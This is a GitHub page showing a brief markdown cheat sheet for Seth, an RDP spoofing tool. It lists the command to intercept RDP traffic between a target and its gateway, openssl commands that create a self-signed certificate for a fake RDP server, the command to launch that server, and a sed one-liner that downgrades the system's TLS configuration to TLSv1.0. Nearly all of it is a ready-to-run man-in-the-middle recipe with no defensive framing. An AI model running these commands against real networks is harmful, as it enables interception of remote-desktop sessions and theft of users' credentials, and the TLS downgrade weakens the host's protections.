Skip to content

Latest commit

 

History

History
25 lines (20 loc) · 630 Bytes

seth.md

File metadata and controls

25 lines (20 loc) · 630 Bytes

Source

https://github.com/SySS-Research/Seth

RDP spoofing

./seth.sh eth0 <attackerIp> <targetIp> <gatewayIp>

Create local RDP server with self generated certificates

openssl genrsa -des3 -out certificate.key 4096
openssl req -new -key certificate.key -out certificate.csr
openssl x509 -req -days 365 -in certificate.csr -signkey certificate.key -out certificate.crt

Start RDP server

python3 seth.py -c certificate.crt -k certificate.key <targetIp>

If SSL error occurs - you might need to downgrade the protocol version

sed -i 's/TLSv1.2/TLSv1.0/' -i /etc/ssl/openssl.cnf